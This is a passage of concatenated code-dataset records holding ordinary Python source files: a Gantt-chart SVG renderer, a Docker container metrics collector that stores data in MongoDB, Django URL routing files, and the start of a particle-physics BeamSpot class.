be extended to\n include extra days to compensate for Saturday and Sunday.\n \"\"\"\n work_done = 0\n end_date = self.start_date\n while work_done + 1 < self.duration:\n end_date += ONE_DAY\n\n if end_date.weekday() not in self.project.chart.skipped_days:\n work_done += 1\n\n return end_date\n\n def svg(self, prev_y=0, start=None, end=None, color=None, level=None, offset=0):\n \"\"\"\n Return SVG for drawing this task.\n\n Keyword arguments:\n prev_y -- int, line to start to draw\n start -- datetime.date of first day to draw\n end -- datetime.date of last day to draw\n color -- string of color for drawing the project\n level -- int, indentation level of the project, not used here\n scale -- drawing scale (d: days, w: weeks, m: months, q: quaterly)\n title_align_on_left -- boolean, align task title on left\n offset -- X offset from image border to start of drawing zone\n \"\"\"\n if not self.is_scheduled:\n raise Exception('Unable to draw task until it has been scheduled')\n\n add_modified_begin_mark = False\n add_modified_end_mark = False\n\n add_begin_mark = False\n add_end_mark = False\n\n y = prev_y * 10\n\n if color is None:\n color = self.resources[0].color\n\n def _time_diff(e, s):\n return (e - s).days\n def _time_diff_d(e, s):\n return _time_diff(e, s) + 1\n\n # cas 1 -s--S==E--e-\n if self.start_date >= start and self.end_date <= end:\n x = _time_diff(self.start_date, start) * 10\n d = _time_diff_d(self.end_date, self.start_date) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n # cas 5 -s--e--S==E-\n elif self.start_date > end:\n return (None, 0)\n # cas 6 -S==E-s--e-\n elif self.end_date < start:\n return (None, 0)\n # cas 2 -S==s==E--e-\n elif self.start_date < start and self.end_date <= end:\n x = 0\n d = _time_diff_d(self.end_date, start) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n add_begin_mark = True\n # cas 3 -s--S==e==E-\n elif self.start_date >= start and self.end_date > end:\n x = _time_diff(self.start_date, start) * 10\n d = _time_diff_d(end, self.start_date) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n add_end_mark = True\n # cas 4 -S==s==e==E-\n elif self.start_date < start and self.end_date > end:\n x = 0\n d = _time_diff_d(end, start) * 10\n self.drawn_x_begin_coord = x\n self.drawn_x_end_coord = x+d\n add_end_mark = True\n add_begin_mark = True\n else:\n return (None, 0)\n\n\n self.drawn_y_coord = y\n\n svg = svgwrite.container.Group(id=re.sub(r\"[ ,'\\/()]\", '_', self.name))\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1+offset)*mm, (y+1)*mm),\n size=((d-2)*mm, 8*mm),\n fill=color,\n stroke=color,\n stroke_width=2,\n opacity=0.85,\n ))\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1+offset)*mm, (y+6)*mm),\n size=(((d-2))*mm, 3*mm),\n fill=\"#909090\",\n stroke=color,\n stroke_width=1,\n opacity=0.2,\n ))\n\n if add_modified_begin_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1)*mm, (y+1)*mm),\n size=(5*mm, 4*mm),\n fill=\"#0000FF\",\n stroke=color,\n stroke_width=1,\n opacity=0.35,\n ))\n\n if add_modified_end_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+d-7+1)*mm, (y+1)*mm),\n size=(5*mm, 4*mm),\n fill=\"#0000FF\",\n stroke=color,\n stroke_width=1,\n opacity=0.35,\n ))\n\n\n if add_begin_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1)*mm, (y+1)*mm),\n size=(5*mm, 8*mm),\n fill=\"#000000\",\n stroke=color,\n stroke_width=1,\n opacity=0.2,\n ))\n if add_end_mark:\n svg.add(svgwrite.shapes.Rect(\n insert=((x+d-7+1)*mm, (y+1)*mm),\n size=(5*mm, 8*mm),\n fill=\"#000000\",\n stroke=color,\n stroke_width=1,\n opacity=0.2,\n ))\n\n if self.percent_done is not None and self.percent_done > 0:\n # Bar shade\n svg.add(svgwrite.shapes.Rect(\n insert=((x+1+offset)*mm, (y+6)*mm),\n size=(((d-2)*self.percent_done/100)*mm, 3*mm),\n fill=\"#F08000\",\n stroke=color,\n stroke_width=1,\n opacity=0.35,\n ))\n\n # Title alignment\n tx = x+2\n\n svg.add(svgwrite.text.Text(self.name, insert=((tx)*mm, (y + 5)*mm), fill=FONT_ATTR['fill'], stroke=FONT_ATTR['stroke'], stroke_width=FONT_ATTR['stroke_width'], font_family=FONT_ATTR['font_family'], font_size=15))\n\n if self.resources is not None:\n t = \" / \".join([\"{0}\".format(r.name) for r in self.resources])\n svg.add(svgwrite.text.Text(\"{0}\".format(t), insert=(tx*mm, (y + 8.5)*mm), fill='purple', stroke=FONT_ATTR['stroke'], stroke_width=FONT_ATTR['stroke_width'], font_family=FONT_ATTR['font_family'], font_size=15-5))\n\n return (svg, 1)\n\n def svg_dependencies(self):\n \"\"\"\n Draws svg dependencies between task and project according to coordinates\n cached when drawing tasks\n \"\"\"\n if not self.dependencies:\n return None\n else:\n svg = svgwrite.container.Group()\n for t in self.dependencies:\n if not (t.drawn_x_end_coord is None or t.drawn_y_coord is None or self.drawn_x_begin_coord is None):\n # horizontal line\n svg.add(svgwrite.shapes.Line(\n start=((t.drawn_x_end_coord - 2)*mm, (t.drawn_y_coord + 5)*mm),\n end=((self.drawn_x_begin_coord)*mm, (t.drawn_y_coord + 5)*mm),\n stroke='black',\n stroke_dasharray='5,3',\n ))\n\n marker = svgwrite.container.Marker(insert=(5,5), size=(10,10))\n marker.add(svgwrite.shapes.Circle((5, 5), r=5, fill='#000000', opacity=0.5, stroke_width=0))\n svg.add(marker)\n # vertical line\n eline = svgwrite.shapes.Line(\n start=((self.drawn_x_begin_coord)*mm, (t.drawn_y_coord + 5)*mm),\n end=((self.drawn_x_begin_coord)*mm, (self.drawn_y_coord + 5)*mm),\n stroke='black',\n stroke_dasharray='5,3',\n )\n eline['marker-end'] = marker.get_funciri()\n svg.add(eline)\n\n return svg\n\n def __str__(self):\n \"\"\"\n All dates and resources for task\n \"\"\"\n return '\\tTask {} ({} resources, {} dependencies): {} days, {} through {}'.format(\n self.name,\n len(self.resources),\n len(self.dependencies),\n self.duration,\n self.start_date,\n self.end_date,\n )\n\n\nclass SchedulingError(Exception):\n \"\"\"\n Exceptions related to improperly configured or impossible scheduling\n \"\"\"\n pass\n\n\nclass _my_svgwrite_drawing_wrapper(svgwrite.Drawing):\n \"\"\"\n Hack for beeing able to use a file descriptor as filename\n \"\"\"\n def save(self, width='100%', height='100%'):\n \"\"\" Write the XML string to **filename**. \"\"\"\n test = False\n import io\n\n # Fix height and width\n self['height'] = height\n self['width'] = width\n\n test = type(self.filename) == io.TextIOWrapper\n\n if test:\n self.write(self.filename)\n else:\n fileobj = io.open(str(self.filename), mode='w', encoding='utf-8')\n self.write(fileobj)\n fileobj.close()\n","repo_name":"traherom/simple-scheduler","sub_path":"projectscheduler/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":27556,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"4608742889","text":"import pytz\nimport logging\nimport os\nfrom app import app\nfrom datetime import datetime\nimport mongodb_wrapper\nfrom runtime import runtime\nimport metric_handler\nimport threading\nfrom timeloop import Timeloop\nfrom datetime import timedelta\nfrom lib.API_Wrapper import DEHAPIWrapper\nfrom multiprocessing.pool import ThreadPool\nimport re\nimport pymongo\nimport traceback\nimport sys\n\ntl = Timeloop()\ncontainer_name = None\nlogger = logging.getLogger(\"./MetricsUpdater.log\")\n# LOGLEVEL = app.config[\"LOGLEVEL\"]\n# logging.basicConfig(level=LOGLEVEL)\n\nif app.config['secure_connection'].lower().strip() == \"true\":\n # print(\"DEH Client - Attempting to establish communication with Docker Host over secured channel.\")\n logger.info(\"DEH Client - Attempting to establish communication with Docker Host over secured channel.\")\n CERT_BASE = app.config[\"tls_cert_path\"]\n docker_ca_cert = CERT_BASE + \"/ca.pem\"\n docker_client_cert = CERT_BASE + \"/cert.pem\"\n docker_client_key = CERT_BASE + \"/key.pem\"\n paths = [docker_ca_cert, docker_client_cert, docker_client_key]\n https_url = app.config[\"docker_host\"]\n for path in paths:\n if os.path.exists(path):\n pass\n else:\n logger.info(\"DEH Client's metrics updater module - In an attempt to establish secured communication, \"\n \"found missing cert. file {}. Ensure all necessary cert., \"\n \"files are copied starting DEH Client.\".format(path))\n\n try:\n measure_usage_client = metric_handler.MetricHandler(docker_ca_cert,\n docker_client_cert,\n docker_client_key, https_url, container_name)\n except Exception as Error:\n logger.info(\"DEH Client's metrics updater module - In an attempt to establish secured communication, \"\n \"failed to create metric handler client with ERROR {}. \".format(Error))\n\nelif app.config['secure_connection'].lower().strip() == \"false\":\n # print(\"Warning DEH Client - Attempting to establish open communication with Docker Host i.e. unsecured. \")\n logger.info(\"Warning DEH Client - Attempting to establish open communication with Docker Host i.e. unsecured. \")\n docker_ca_cert = None\n docker_client_cert = None\n docker_client_key = None\n https_url = app.config[\"docker_host\"]\n http_url = re.sub(\"^https://\", \"http://\", https_url)\n try:\n measure_usage_client = metric_handler.MetricHandler(docker_ca_cert,\n docker_client_cert,\n docker_client_key, http_url, container_name)\n\n except Exception as Error:\n logger.info(\"DEH Client's metrics updater module - In an attempt to establish unsecured communication, \"\n \"failed to create metric handler client with ERROR {}. \".format(Error))\n\n\nclass MetricsUpdater:\n __logger = logging.getLogger(\"DEHClientEnabler.metric_updater\")\n # loglevel = app.config[\"LOGLEVEL\"]\n # logging.basicConfig(level=loglevel)\n MAX_THREAD_POOL_SIZE = 500000\n last_metrics_posted = datetime.now()\n def __init__(self):\n \"\"\"Initializes the logger and the docker client connection.\n \"\"\"\n # self.CERT_BASE = app.config[\"tls_cert_path\"]\n # self.docker_ca_cert = self.CERT_BASE + \"/ca.pem\"\n # self.docker_client_cert = self.CERT_BASE + \"/cert.pem\"\n # self.docker_client_key = self.CERT_BASE + \"/key.pem\"\n # self.https_url = app.config[\"docker_host\"]\n # self.container_name = None\n # self.DOCKER_CLIENT_TIMEOUT = 3\n # self.keep_measuring = True\n\n self.__logger = logging.getLogger(\"./MetricsUpdater.log\")\n # self.loglevel = app.config[\"LOGLEVEL\"]\n # logging.basicConfig(level=self.loglevel)\n try:\n self.mongo_client = mongodb_wrapper.MongoAPI(hostname=app.config[\"mongo_host\"],\n port=app.config[\"mongo_port\"],\n database=app.config[\"mongo_db\"],\n collection=app.config[\"mongo_collection_metrics\"])\n if self.mongo_client:\n self.__logger.info(\"Successfully established connection with internal mongodb\")\n\n except Exception as Error:\n self.__logger.error(\"Failed to establish communication with the mongoDB with ERROR: {},\"\n \"Please check DB connection string in .env & docker-compose file, \"\n \"if started as Docker Container. Else check in app.py if run from code directly. \" \n \"\".format(Error))\n # Internal config\n self.metrics_capture_time_interval = runtime.config[\"unit_of_measure\"]\n self.metrics_sorting_by = runtime.config[\"sort_by\"]\n self.metrics_no_of_records = runtime.config[\"no_of_records_per_timestamp\"]\n\n # self.measure_usage_client = metric_handler.MetricHandler(self.docker_ca_cert, self.docker_client_cert,\n # self.docker_client_key,\n # self.https_url,\n # self.container_name)\n\n # thread pool\n\n def thread_start(self):\n self.__thread = threading.Thread(target=self.run, args=())\n self.__thread.daemon = True\n self.__thread.start()\n self.__thread.join()\n\n def manage_write_metrics_to_db(self, individual_metric):\n \"\"\"\n Format the metrics generated by metrics_handler to the desired DataModel recommended by RRM & publish the data\n Implemented : Updates the DB\n Future : POST to RRM Consumer API\n \"\"\"\n utc_current_datetime = datetime.now(pytz.timezone(\"UTC\"))\n # utc_current_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%d %H:%M:%S %Z%z\")\n utc_current_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n resource_id = None\n try:\n for i in individual_metric:\n resource_id = individual_metric[i][\"info\"][\"container_id\"]\n MetricsUpdater.__logger.info(\"Attempting to write metrics to local DB for container id : {}\"\n .format(resource_id))\n MetricsUpdater.__logger.debug(\"Metrics data for container id : {} generated is : {}\"\n .format(resource_id, individual_metric))\n current_cpu_percent = individual_metric[i][\"Volume\"][\"cpu\"][\"cpu_percent\"]\n current_mem_percent = individual_metric[i][\"Volume\"][\"mem\"][\"mem_percent\"]\n uptime = individual_metric[i][\"Uptime\"]\n hostname = individual_metric[i][\"HostName\"]\n ip = individual_metric[i][\"IP\"]\n bse_id = individual_metric[i][\"BSE_ID\"]\n uid = individual_metric[i][\"RRM_ID\"]\n image = individual_metric[i][\"Image\"]\n updated_cpu_present = {\"time_stamp\": utc_current_datetime_str,\n \"cpu_percent\": current_cpu_percent}\n updated_mem_present = {\"time_stamp\": utc_current_datetime_str,\n \"mem_percent\": current_mem_percent}\n # Read DB if the resource data is already persisted. If exists update record\n MetricsUpdater.__logger.info(\"Checking if record for container id : {} ,is already persisted to DB. \"\n \"If so update existing record, else insert a new record. \"\n .format(resource_id))\n documents = self.mongo_client.read({\"_id\": resource_id})\n if documents:\n formatted_data = {}\n MetricsUpdater.__logger.info(\"Record for container id : {} ,is already persisted to DB. \"\n \"So updating existing record in DB with current metrics data. \"\n .format(resource_id))\n for document in documents:\n utc_lastupdated_datetime = datetime.now(pytz.timezone(\"UTC\"))\n utc_lastupdated_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n cpu_percent = self.metrics_sorting_by[\"cpu\"]\n mem_percent = self.metrics_sorting_by[\"memory\"]\n cpu_update = self.mongo_client.update_array(resource_id, \"cpu_percent\", updated_cpu_present,\n cpu_percent,\n retain_no_of_records=self.metrics_no_of_records)\n mem_update = self.mongo_client.update_array(resource_id, \"mem_percent\", updated_mem_present,\n mem_percent,\n retain_no_of_records=self.metrics_no_of_records)\n if cpu_update and mem_update:\n MetricsUpdater.__logger.info(\"Metrics data updated for for container id : {} \"\n \"updated successfully to local DB.\".format(resource_id))\n else:\n MetricsUpdater.__logger.warning(\"Failed to update Metrics data for container id : {}, \"\n \" possibly cpu & mem attributes missing from \"\n \"metrics generated.\"\n .format(resource_id))\n\n # If rrm_id & bse_id generated after record persisted in mongodb, update the same.\n mongo_bse_id = document[\"BSE_ID\"]\n mongo_uid = document[\"RRM_ID\"]\n if mongo_uid is None:\n uid = individual_metric[i][\"RRM_ID\"]\n if mongo_bse_id is None:\n bse_id = individual_metric[i][\"BSE_ID\"]\n\n updated_metadata = {}\n try:\n updated_metadata = {\"uptime\": uptime,\n \"lastupdated\": utc_lastupdated_datetime_str,\n \"RRM_ID\": uid,\n \"BSE_ID\": bse_id\n }\n MetricsUpdater.__logger.info(\"Record for container id : {} already persisted to DB. \"\n \"Attempting to updated metadata: {}. \"\n .format(resource_id, updated_metadata))\n output = self.mongo_client.update_one(resource_id, updated_metadata)\n\n if 'Status' in output:\n if output['Status'] == 'Successfully Updated':\n MetricsUpdater.__logger.info(\"Record for container id : {} \"\n \"already persisted to DB. \"\n \"Successfully updated metadata: {}.\"\n .format(resource_id, updated_metadata))\n elif output['Status'] == \"Nothing was updated\":\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already. \"\n \"Skipping write/ update. \"\n .format(resource_id))\n else:\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already. \"\n \"Skipping write/ update. \"\n .format(resource_id))\n else:\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already. \"\n \"Skipping write/ update. \"\n .format(resource_id))\n except Exception as error:\n MetricsUpdater.__logger.warning(\"Seems record for container id : {} \"\n \"not persisted to DB already or \"\n \"failed to update existing record. \"\n \"Skipping write/ update with error: {}. \"\n .format(resource_id, error))\n\n # If new resource create a new record/ document\n else:\n \"\"\"\n # GET BSE registration info\n # TODO handle multiple BSE registrations with same name\n # & attempt to update IDs only if previous iterations failed to get info\n host = app.config[\"DEH_BSE_Proxy_URL\"]\n method = app.config[\"DEH_BSE_GET_SERVICE\"]\n # Note : The service name is case sensitive\n deh_bse_obj = DEHAPIWrapper(host, method,\n payload={\"service_name\": resource_name})\n status_code, response = deh_bse_obj.deh_bse_get_running_services()\n if status_code == 200 and response.json() != {}:\n for bse_response_dict in response.json():\n bse_id = response.json()[bse_response_dict][\"ID\"]\n # Exit in case of multiple registration with same name\n break\n else:\n bse_id = None\n # GET RRM registration info\n method = app.config[\"DEHEnablerHub_Search_Resource\"]\n deh_enabler_hub_obj = DEHAPIWrapper()\n parameters = {\"name\": resource_name}\n status_code, response = deh_enabler_hub_obj.deh_enabler_hub_resource_search(payload=parameters,\n method=method)\n if status_code == 200:\n contents = response.json()[\"content\"]\n if len(contents) > 0:\n for content in contents:\n rrm_id = content[\"uid\"]\n \"\"\"\n # Writing to DB\n MetricsUpdater.__logger.info(\"No record for container id : {} in DB. \"\n \"So attempting to insert new record with metrics data. \"\n .format(resource_id))\n formatted_data = {\"_id\": resource_id,\n \"uptime\": uptime,\n \"hostname\": hostname,\n \"ip\": ip,\n \"image\": image,\n \"BSE_ID\": bse_id,\n \"RRM_ID\": uid,\n \"first_inserted\": utc_current_datetime_str,\n \"lastupdated\": utc_current_datetime_str,\n \"cpu_percent\": [updated_cpu_present],\n \"mem_percent\": [updated_mem_present]}\n\n\n # TODO: Retain Historic Data in DB\n if runtime.config['db_keep_non_uid_records'] == \"False\" or \\\n runtime.config['db_keep_non_uid_records'] == False:\n if formatted_data['RRM_ID'] is not None:\n write = self.mongo_client.write(formatted_data)\n if write:\n MetricsUpdater.__logger.info(\"Metrics data for container id : {} \"\n \"inserted successfully to local DB.\".format(resource_id))\n MetricsUpdater.__logger.debug(\"Metrics data for container id : {} \"\n \"inserted .\".format(formatted_data))\n else:\n MetricsUpdater.__logger.warning(\"Failed to write Metrics data for container id : {} \"\n \"to local DB.\".format(resource_id))\n MetricsUpdater.__logger.debug(\"Metrics data for container id : {} \"\n \"which was attempted to insert was : {} .\"\n .format(resource_id, formatted_data))\n else:\n MetricsUpdater.__logger.warning(\"Skip writing metrics data to DB since the \"\n \"container id : {} of DEH Resource : {} , \"\n \"is not associated with uid. \"\n \"Please associate an valid UID to track metrics. \"\n .format(formatted_data['_id'],\n formatted_data['image']))\n elif runtime.config['db_keep_non_uid_records'] == \"True\" or \\\n runtime.config['db_keep_non_uid_records'] == True:\n write = self.mongo_client.write(formatted_data)\n\n if write:\n MetricsUpdater.__logger.info(\"Metrics data for container id : {} \"\n \"inserted successfully to local DB.\".format(resource_id))\n else:\n MetricsUpdater.__logger.error(\"Failed to write metrics data to DB for the \"\n \"container id : {} & data attempted to write : {} .\"\n .format(formatted_data['_id'], formatted_data))\n\n except KeyError as error:\n MetricsUpdater.__logger.warning(\"Exception encountered, while monitoring container id {} possible causes:\"\n \"Cause 1: Container under monitoring stopped while metrics generation \"\n \"was in progress. or . \"\n \"Cause 2: Metrics not generated properly ie certain fields not captured. \"\n \"Please check and start/ restart containers\".format(resource_id))\n MetricsUpdater.__logger.warning(\"Exception encountered : KeyError & Possibly missing keyword. \"\n \"details : {}. \".format(error))\n\n except Exception as error:\n MetricsUpdater.__logger.warning(\"Exception encounter while monitoring container {}. \".format(resource_id))\n MetricsUpdater.__logger.warning(\"Exception details : {}. \".format(error))\n\n @tl.job(interval=timedelta(seconds=runtime.config['unit_of_measure']))\n def measure_usage(resource_status=\"Running\"):\n max_usage = 0\n metrics = []\n try:\n time_interval = runtime.config['unit_of_measure']\n MetricsUpdater.__logger.info(\"Attempting to generate metrics periodically i.e. at an interval of : {} \"\n \"seconds, metrics data will be captured for all containers with status : {} \"\n \"and are associated with a valid UID. \"\n .format(time_interval, resource_status))\n metrics = measure_usage_client.get_metrics_by_status_only_with_uid({\"status\": resource_status})\n if metrics:\n for individual_metric in metrics:\n try:\n MetricsUpdater.__logger.info(\"Metrics data generated i.e. found containers matching status {} \"\n \", proceeding to write to DB. \".format(resource_status))\n # This loop is for accessing the values of dict individual_metric\n utc_current_datetime = datetime.now(pytz.timezone(\"UTC\"))\n utc_current_datetime_str = utc_current_datetime.strftime(\"%Y-%m-%d %H:%M:%S %Z%z\")\n metrics_updater = MetricsUpdater()\n metrics_updater.manage_write_metrics_to_db(individual_metric)\n # except KeyError as error:\n # MetricsUpdater.__logger.error(\n # \"Exception encountered while writing data to local DB for docker container : \"\n # \"{} \".format(individual_metric))\n # MetricsUpdater.__logger.error(\"Exception encountered : KeyError & Possibly missing keyword. \"\n # \"details : {}. \".format(error))\n #\n # except Exception as error:\n # MetricsUpdater.__logger.error(\n # \"Exception encountered while writing metrics data to local DB for docker container : \"\n # \"{}. \".format(individual_metric))\n # MetricsUpdater.__logger.error(\"Exception details : {}. \".format(error))\n except KeyError as error:\n MetricsUpdater.__logger.warning(\"Exception encountered while writing metrics data to local db, \"\n \"KeyError & Possibly missing keyword. details : {}. \"\n .format(error))\n continue\n except AttributeError as error:\n MetricsUpdater.__logger.warning(\"Exception encountered while writing metrics data to local db, \"\n \"details : {}. \".format(error))\n continue\n except Exception as error:\n MetricsUpdater.__logger.warning(\"Exception encountered while writing metrics data to local db, \"\n \"details : {}. \".format(error))\n continue\n else:\n MetricsUpdater.__logger.warning(\"No Docker Container/s is/are running on the configured Docker Host \"\n \"for monitoring. \"\n \"To generate and start tracking metrics, \"\n \"Please start some Container instance of DEH resources, with \"\n \"valid RRM registration(UID) associated with the same. \")\n\n except Exception as error:\n # MetricsUpdater.__logger.warning(\"Exception encountered while capturing metrics / writing to db.\"\n # .format(error))\n if len(metrics) == 0:\n MetricsUpdater.__logger.warning(\"No Docker Container/s is/are running on the configured Docker Host \"\n \"for monitoring. \"\n \"To generate and start tracking metrics, \"\n \"Please start some Container instance of DEH resources, with \"\n \"valid RRM registration(UID) associated with the same. \")\n else:\n MetricsUpdater.__logger.warning(\"Exception encountered while capturing metrics / writing to db.\"\n .format(error))\n\n @tl.job(interval=timedelta(seconds=runtime.config['timestamp']))\n def post_metrics_rrm_thread(resource_status=\"Running\"):\n ## Read data from metrics db\n post_metrics = None\n mongo_client = mongodb_wrapper.MongoAPI(hostname=app.config[\"mongo_host\"],\n port=app.config[\"mongo_port\"],\n database=app.config[\"mongo_db\"],\n collection=app.config[\"mongo_collection_metrics\"])\n documents = mongo_client.find_projection({},\n {\"cpu_percent\":\n {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]},\n \"mem_percent\":\n {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]}}\n )\n records = []\n for document in documents:\n records.append([document])\n deh_enabler_hub_obj = DEHAPIWrapper()\n\n if len(records) >= 1:\n MetricsUpdater.__logger.info(\"Post metrics to RRM, Found metrics records in local db to be posted to RRM, \"\n \"Now attempt to POST. \")\n try:\n # with ThreadPool() as pool:\n # post_metrics = pool.map(deh_enabler_hub_obj.initiate_post_deh_metrics_request, records)\n # MetricsUpdater.last_metrics_posted = datetime.now()\n # MetricsUpdater.__logger.info(\"Post metrics to RRM, Last successful metrics post to RRM : {}. \"\n # .format(MetricsUpdater.last_metrics_posted))\n # return post_metrics\n for record in records:\n MetricsUpdater.__logger.debug(\"Post metrics to RRM, attempting to post metrics for record: {}.\"\n .format(record))\n post_metrics = deh_enabler_hub_obj.initiate_post_deh_metrics_request(record)\n return post_metrics\n except Exception as E:\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, \"\n \"Exception encountered While Initiating Post Metrics Thread, with \"\n \"exception: {}. \".format(E))\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, \"\n \"Exception encountered While Initiating Post Metrics Thread, with \"\n \"trace: {}. \".format(traceback.format_exc()))\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, \"\n \"Exception encountered While Initiating Post Metrics Thread, with \"\n \"trace: {}. \".format(sys.exc_info()[2]))\n return None\n\n else:\n MetricsUpdater.__logger.warning(\"Post metrics to RRM, No metrics found in local db to be posted to RRM. \"\n \"Please check, \"\n \"1) If any DEH containers are running on the configured \"\n \"Docker Host.\"\n \"2) If any Containers are running, \"\n \"ensure the same is associated with valid UID. \"\n \"Please refer installation instructions document on how to do so. \"\n \"3) Ensure local mongodb containers is up and running. \")\n pass\n\n # @tl.job(interval=timedelta(seconds=runtime.config['retry_timestamp']))\n # def retry_post_metrics_to_rrm(resource_status=\"Running\"):\n # last_successful_metrics_post = MetricsUpdater.last_metrics_posted\n # current_time_stamp = datetime.now()\n # time_difference = (current_time_stamp - last_successful_metrics_post).total_seconds()\n # if time_difference >= runtime.config['retry_timestamp']:\n # MetricsUpdater.__logger.info(\"Retry post metrics to RRM, \"\n # \"Found metrics records in local db to be posted to RRM, \"\n # \"Now attempt to retry POST. \")\n # mongo_client = mongodb_wrapper.MongoAPI(hostname=app.config[\"mongo_host\"],\n # port=app.config[\"mongo_port\"],\n # database=app.config[\"mongo_db\"],\n # collection=app.config[\"mongo_collection_metrics\"])\n # documents = mongo_client.find_projection({},\n # {\"cpu_percent\":\n # {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]},\n # \"mem_percent\":\n # {\"$slice\": runtime.config[\"no_of_records_per_timestamp\"]}}\n # )\n # records = []\n # for document in documents:\n # records.append([document])\n #\n # if len(records) >= 1:\n # MetricsUpdater.__logger.info(\"Retry post metrics to RRM, \"\n # \"Found metrics records in local db to be posted to RRM, \"\n # \"Now attempt to POST to RRM. \")\n # deh_enabler_hub_obj = DEHAPIWrapper()\n #\n # try:\n # with ThreadPool(min(MetricsUpdater.MAX_THREAD_POOL_SIZE, len(records))) as pool:\n # post_metrics = pool.map(deh_enabler_hub_obj.initiate_post_deh_metrics_request, records)\n # return post_metrics\n #\n # except Exception as E:\n # MetricsUpdater.__logger.warning(\"Retry post metrics to RRM, \"\n # \"Exception encountered While Retry Post Metrics Thread, with \"\n # \"exception: {}. \".format(E))\n # return None\n # else:\n # MetricsUpdater.__logger.warning(\"Retry post metrics to RRM, No metrics found in local db to be \"\n # \"posted to RRM. Please check, \"\n # \"1) If any DEH containers are running on the configured \"\n # \"Docker Host.\"\n # \"2) If any Containers are running, \"\n # \"ensure the same is associated with valid UID. \"\n # \"Please refer installation instructions document on how to do so. \"\n # \"3) Ensure local mongodb containers is up and running. \")\n # pass\n\n @tl.job(interval=timedelta(seconds=runtime.config['delete_record_service_interval']))\n def purge_older_internal_db_records(resource_status=\"Running\"):\n \"\"\" Module to delete metrics records in local DB which are not posted to RRM\"\"\"\n utc_current_datetime = datetime.now(pytz.timezone(\"UTC\"))\n utc_timedelta_datetime = utc_current_datetime - timedelta(seconds=runtime.config['delete_record'])\n utc_current_datetime_str = utc_timedelta_datetime.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n deh_enabler_hub_obj = DEHAPIWrapper()\n query = {\"first_inserted\": {\"$lt\": utc_current_datetime_str}}\n MetricsUpdater.__logger.info(\"Attempting to delete older internal db records .i.e. older than: {} seconds.\"\n \"\".format(runtime.config['delete_record']))\n remove_document = deh_enabler_hub_obj.delete_local_db_records(query)\n\n def run(self):\n try:\n tl.start(block=True)\n except Exception as E:\n MetricsUpdater.__logger.warning(\"Exception Encountered during : {} \".format(E))\n pass\n\n\nif __name__ == \"__main__\":\n metrics_updater = MetricsUpdater()\n metrics_updater.run()\n \"\"\"\n with ThreadPoolExecutor() as executor:\n monitor = MetricsMonitor()\n mem_thread = executor.submit(monitor.measure_usage(resource))\n try:\n fn_thread = executor.submit(my_analysis_function)\n result = fn_thread.result()\n finally:\n monitor.keep_measuring = False\n max_usage = mem_thread.result()\n\n print(f\"Peak memory usage: {max_usage}\")\n \"\"\"","repo_name":"sundaresanrocks/DEHClien_Code","sub_path":"resource_monitor/metric_updater.py","file_name":"metric_updater.py","file_ext":"py","file_size_in_byte":34230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27138593093","text":"from django.conf.urls import include, url\nfrom oneverse_api import views\n\nurlpatterns = [\n url(r'^$', 'oneverse_api.views.oneverse_get_one_today'),\n url(r'^gcm/register/$', 'oneverse_api.gcm_views.save_user_gcm_registration_id'),\n url(r'^add/$', views.CreateVerseView.as_view()),\n url(r'^list/$', views.ListVerseView.as_view()),\n url(r'^update/(?P[0-9]+)/$', views.UpdateVerseView.as_view(),\n name=\"verse-detail\"),\n]\n","repo_name":"kensupernova/oneverse-web-app","sub_path":"oneverse_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31646274578","text":"from rest_framework.routers import DefaultRouter\nfrom . import views\n\n\nrouter = DefaultRouter()\nrouter.APIRootView = views.NextBoxUIPluginRootView\n\nrouter.register(r'savedtopologies', views.SavedTopologyViewSet)\n\napp_name = \"nextbox_ui_plugin-api\"\nurlpatterns = router.urls\n","repo_name":"iDebugAll/nextbox-ui-plugin","sub_path":"nextbox_ui_plugin/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":430,"dataset":"github-code","pt":"40"} +{"seq_id":"27153810423","text":"import ROOT\nfrom ROOT import gROOT,TEllipse, TH1F, TH2F, TCanvas, TF1, TFile, TGraph, gApplication, TLegend\nimport math\n\n\n\n################################################\n## Class BeamSpot\n################################################\n\nclass BeamSpot:\n def __init__(self):\n self.x = 0\n self.y = 0\n self.xErr = 0\n self.yErr = 0\n self.xwidth = 0\n self.ywidth = 0\n self.xwidthErr = 0\n self.ywidthErr = 0\n \n def __init__(self,X=0,Y=0,XErr=0,YErr=0,XWidth=0,YWidth=0,XWidthErr=0,YWidthErr=0):\n self.x = X\n self.y = Y\n self.xErr = XErr\n self.yErr = YErr\n self.xwidth = XWidth\n self.ywidth = YWidth\n self.xwidthErr = XWidthErr\n self.ywidthErr = YWidthErr\n\n def Distance(self,beam):\n math.sqrt((self.x-beam.x)*(self.x-beam.x)+(self.y-beam.y)*(self.y-beam.y))\n \n #return x-shift and the associated error\n def 